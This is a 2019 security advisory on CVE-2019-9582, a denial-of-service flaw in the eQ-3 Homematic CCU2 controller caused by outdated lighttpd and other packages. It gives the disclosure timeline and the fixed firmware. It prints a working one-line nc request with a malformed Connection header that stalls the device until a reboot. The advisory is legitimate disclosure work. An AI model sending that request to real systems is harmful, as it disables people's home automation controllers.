CVE-2019-9582 eQ-3 Homematic CCU2 outdated base software packages allows Denial of Service

Overview

  • CVE: CVE-2019-9582
  • Author: psytester
  • Title: eQ-3 Homematic CCU2 outdated base software packages allows Denial of Service
  • Vulnerability Type: CWE-400 Uncontrolled Resource Consumption
  • CVSSv3 Base Score: 7.5
  • CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  • Publishing Date: 24.07.2019
  • Updated: 10.12.2019
  • Vendor: eQ-3 AG
  • Product: Homematic CCU2
  • Vendor contacted: 29.01.2019
  • Vendor confirmation: 27.04.2019
  • Vendor patch: 2.49.17 since 09.12.2019
  • Vendor Reference: [HMCCU-359] in changelog of CCU2
  • Affected Firmware version: 2.35.16, 2.41.5, 2.41.8, 2.41.9, 2.45.6, 2.45.7, 2.47.10, 2.47.12, 2.47.15, 2.47.20 tested

Background

From vendor’s website:
HomeMatic Central Control Unit CCU2

Homematic Central Control Unit is the central element of your Homematic system, offering a whole range of control, monitoring and configuration options for all the Homematic devices in your installation
[….]

Past eQ-3 press release about taking security updates seriously (in German only):
[…]
eQ-3 ist es wichtig, dass auch solche Lücken geschlossen werden, die für die meisten Installationen keine Rolle spielen.
[…]
Obwohl nur Nutzer betroffen sind, die gegen Sicherheitshinweise von eQ-3 verstoßen oder seit mehreren Jahren keine Sicherheitsupdates installiert haben, gibt eQ-3 solchen Fällen hohe Priorität und behebt entsprechende Sicherheitslücken schnellstmöglich nach Bekanntwerden in neuen Software-Versionen und Hotfixes.
[…]

Issue Description

The analysis of the underlying operating system of the CCU2 revealed that the BusyBox version 1.20.2 from 2012 with a Buildroot 2012.08 is installed as embedded Linux and that other outdated software packages are also used.

Just to name a few:

Buildroot 2012.08
BusyBox: v1.20.2
OpenSSH: 6.0p1
wget: GNU Wget 1.13.4
lighttpd: 1.4.31
Up to CCU2 Firmware < 2.47.10: Java(TM) SE Embedded Runtime Environment (build 1.8.0_121-b13, profile compact3, headless)
Since CCU2 Firmware >= 2.47.10: Java(TM) SE Embedded Runtime Environment (build 1.8.0_201-b09, profile compact3, headless)
Tcl Tk: 8.2.3
....

After a search for already known CVE entries, the lighttpd process proved to be susceptible because of CVE-2012-5533.

This vulnerability can be exploited by unauthenticated attackers with access to the web interface:

echo -ne "GET / HTTP/1.1\r\nHost: 1.2.3.4\r\nConnection: TC,,Keep-Alive\r\n\r\n" | nc 1.2.3.4 80

After that the lighttpd is permanently in 99% CPU load and the CCU2 does not react anymore with its ReGa core process because the resources are used up:

PID  PPID USER     STAT   VSZ %VSZ %CPU COMMAND
  321     1 root     R     5548   2%  99% /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf

Just a restart of lighttpd process seems to be not enough to fix the overload condition, a reboot is required.

There might be much more vulnerabilities, as written in my German blog post about outdated embedded Linux Busybox/Buildroot installations.

CVE

CVE-2019-9582

CVSSv3 Base Score

CVSSv3 Base Score: 7.5

CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Base software is updated now since December 2019

10 months later the software is almost up-to-date now and this CVE is fixed.

Buildroot: 2019.05
BusyBox: v1.30.1
OpenSSH: 7.9p1
wget: GNU Wget 1.20.3
lighttpd: 1.4.53
java version 1.8.0_201

BTW, this is strange but somehow expected. The newer CCU3 hardware has now an older software base line. ;-)

Buildroot: 2018.08.2
BusyBox: v1.29.2
OpenSSH: 7.8p1
wget: GNU Wget 1.19.5
lighttpd: 1.4.50

Credit

All researchers.
cvedetails for scanning and preparing all CVEs, separated by vendor and product.
me, but I simply scanned known CVEs to use them.

Not owning an original CCU2 or CCU3, but you want to analyze the CCU ‘for free’?
You can download
piVCCU for running the original CCU3 Firmware in lxc container on RaspberryPi
RaspberryMatic for running the opensource OCCU based release on different boards

Disclaimer

The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.

The contents of this advisory are copyright (c) 2019 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

Written on December 10, 2019